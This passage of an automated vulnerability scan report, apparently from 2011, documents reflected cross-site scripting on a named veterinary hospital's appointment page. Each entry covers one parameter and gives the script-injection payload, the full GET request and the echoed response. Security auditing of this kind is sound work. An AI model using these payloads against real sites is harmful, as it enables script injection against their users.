mpm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=60be4"><script>alert(1)</script>496b4f91b44&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.
...[SNIP]...

2.113. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the source request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 321c7"><script>alert(1)</script>32eff3265ff was submitted in the source parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:02 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=mc85tfs8n4tb3ncs6vao1tc4e7; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital321c7"><script>alert(1)</script>32eff3265ff&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26am
...[SNIP]...

2.114. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [submit parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the submit request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 287cc"><script>alert(1)</script>5f92cd18c67 was submitted in the submit parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:06 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3dmerjf0pu4ur5m108fr6u0eo4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23515

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
e2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment287cc"><script>alert(1)</script>5f92cd18c67&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_t
...[SNIP]...

2.115. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time1 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c314"><script>alert(1)</script>8b54768be74 was submitted in the time1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=1c314"><script>alert(1)</script>8b54768be74&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:11 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=va0mcsa20967inl4q6o12l7ce1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="time1" id="time1" type="text" size="15" maxlength="50" value="1c314"><script>alert(1)</script>8b54768be74" />
...[SNIP]...

2.116. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time2 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time2 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36704"><script>alert(1)</script>8897a2f5b0 was submitted in the time2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=36704"><script>alert(1)</script>8897a2f5b0&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:15 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=3pljhhs657854au6aumnm7vhq1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23556

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="time2" id="time2" type="text" size="15" maxlength="50" value="36704"><script>alert(1)</script>8897a2f5b0" />
...[SNIP]...

2.117. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [time3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the time3 request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbc15"><script>alert(1)</script>a12a15661f1 was submitted in the time3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=fbc15"><script>alert(1)</script>a12a15661f1&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:19 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=9nroe6rd3or4ki6oso4miqpib1; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23558

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
<input name="time3" id="time3" type="text" size="15" maxlength="50" value="fbc15"><script>alert(1)</script>a12a15661f1" />
...[SNIP]...

2.118. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [token parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the token request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c98f"><script>alert(1)</script>1c63589670 was submitted in the token parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.NET%2bCLR%2b1.1.4322)&useragent=Mozilla%2f4.0+(compatible%3b+MSIE+6.0%3b+Windows+NT+5.1%3b+SV1%3b+.NET+CLR+1.1.4322) HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: www.vcahospitals.com

Response

HTTP/1.1 200 OK
Date: Sat, 05 Mar 2011 12:48:24 GMT
Server: Apache/2.2.15 (Win32) PHP/5.2.14
X-Powered-By: PHP/5.2.14
Set-Cookie: PHPSESSID=r71o8vgd1ptoa4ae288u3u1u00; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 23514

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="conte
...[SNIP]...
.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d7c98f"><script>alert(1)</script>1c63589670&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%
...[SNIP]...

2.119. http://www.vcahospitals.com/new-york-veterinary-hospital/appt.html [uri parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vcahospitals.com
Path:   /new-york-veterinary-hospital/appt.html

Issue detail

The value of the uri request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64c08"><script>alert(1)</script>fa2f4234571 was submitted in the uri parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /new-york-veterinary-hospital/appt.html?altphone=&ampm1=AM&ampm2=AM&ampm3=AM&appt_type=appt&client=current&date1=&date2=&date3=&doctor=&email=&fname=&guid=&ipaddress=173.193.214.243&lname=&optin=&other=&petage=&petname=&pettype=&phone=&reason=&referer=&source=new-york-veterinary-hospital&submit=Request+An+Appointment&time1=&time2=&time3=&token=32a72466f5237a34daf28231fdde613d&uri=http:%2f%2fwww.vcahospitals.com%2fnew-york-veterinary-hospital%2fappt.html%3faltphone%3d%26ampm1%3dAM%26ampm2%3dAM%26ampm3%3dAM%26appt_type%3dappt%26client%3dcurrent%26date1%3d%26date2%3d%26date3%3d%26doctor%3d%26email%3d%26fname%3d%26guid%3d%26ipaddress%3d173.193.214.243%26lname%3d%26optin%3d%26other%3d%26petage%3d%26petname%3d%26pettype%3d%26phone%3d%26reason%3d%26referer%3d%26source%3dnew-york-veterinary-hospital%26submit%3dRequest%2bAn%2bAppointment%26time1%3d%26time2%3d%26time3%3d%26token%3d69ad90c98185c3bfbf109c1ee7f2ceae%26uri%3dhttp%253a%252f%252fwww.vcahospitals.com%252fnew-york-veterinary-hospital%252fappt.html%253faltphone%253d%2526ampm1%253dAM%2526ampm2%253dAM%2526ampm3%253dAM%2526appt_type%253dappt%2526client%253dcurrent%2526date1%253d%2526date2%253d%2526date3%253d%2526doctor%253d%2526email%253d%2526fname%253d%2526guid%253d%2526ipaddress%253d173.193.214.243%2526lname%253d%2526optin%253d%2526other%253d%2526petage%253d%2526petname%253d%2526pettype%253d%2526phone%253d%2526reason%253d%2526referer%253d%2526source%253dnew-york-veterinary-hospital%2526submit%253dRequest%252bAn%252bAppointment%2526time1%253d%2526time2%253d%2526time3%253d%2526token%253d51f5fe70ad0e7e2f1e3c8de8f48db3fd%2526uri%253dhttp%25253a%25252f%25252fwww.vcahospitals.com%25252fnew-york-veterinary-hospital%25252fappt.html%2526useragent%253dMozilla%25252f4.0%252b(compatible%25253b%252bMSIE%252b6.0%25253b%252bWindows%252bNT%252b5.1%25253b%252bSV1%25253b%252b.NET%252bCLR%252b1.1.4322)%26useragent%3dMozilla%252f4.0%2b(compatible%253b%2bMSIE%2b6.0%253b%2bWindows%2bNT%2b5.1%253b%2bSV1%253b%2b.